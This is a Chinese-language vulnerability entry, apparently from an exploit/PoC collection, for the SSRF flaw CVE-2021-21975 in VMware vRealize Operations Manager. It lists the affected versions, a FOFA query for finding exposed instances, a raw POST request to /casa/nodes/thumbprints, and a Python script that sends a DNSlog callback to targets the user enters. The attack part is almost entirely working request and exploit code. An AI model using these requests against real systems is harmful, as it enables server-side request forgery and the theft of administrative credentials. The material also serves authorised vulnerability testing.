VMware vRealize Operations Manager API SSRF漏洞 (CVE-2021-21975)¶
攻击者通过访问vRealize Operations Manager API传递特定的参数到服务器端进行请求伪造攻击,从而窃取管理凭据,获得一些功能的控制权限。
OVA下载:https://my.vmware.com/group/vmware/patch#search
FOFA:
app="vmware-vRealize-Operations-Manager"
影响版本:
- vRealize Operations Manager 8.3.0
- vRealize Operations Manager 8.2.0
- vRealize Operations Manager 8.1.1
- vRealize Operations Manager 8.1.0
- vRealize Operations Manager 8.0.1
- vRealize Operations Manager 8.0.0
- vRealize Operations Manager 7.5.0
PoC:
POST /casa/nodes/thumbprints HTTP/1.1
Host:target
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
["127.0.0.1:443/ui/"]
nuclei poc:https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-21975.yaml
poc.py:
# CVE-2021-21975
# fofa:title=“vRealize Operations Manager”
import requests
import urllib3
urllib3.disable_warnings()
def title():
print("[-------------------------------------------------------------]")
print("[-------- VMware vRealize Operations Manager SSRF漏洞 ---------]")
print("[-------- CVE-2021-21975 ----------]")
print("[-------- use:python3 CVE-2021-21975 ------------]")
print("[-------- Author:Henry4E36 ------------]")
print("[-------------------------------------------------------------]")
def target_url(url,dnslog):
target_url = url + "/casa/nodes/thumbprints"
headers = {
"User-Agent" : "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:86.0) Gecko/20100101 Firefox/86.0",
"Content-Type" : "application/json;charset=UTF-8"
}
data = f'["{dnslog}"]'
try:
res = requests.post(url=target_url,headers=headers,data=data,verify=False,timeout=5)
if res.status_code == 200:
print(f"[!] \033[31m目标系统: {url} 可能存在SSRF漏洞,请检查DNSLog响应!\033[0m")
print(f"[0] 响应为:{res.text}")
else:
print(f"[0] 目标系统: {url} 不存在SSRF漏洞")
except Exception as e:
print("[!] 目标系统出现意外错误!\n",e)
if __name__ == "__main__":
title()
url = str(input("[-] 请输入需要检测的URL:\n"))
dnslog = str(input("[-] 请输入DNSlog:\n"))
target_url(url,dnslog)
ref: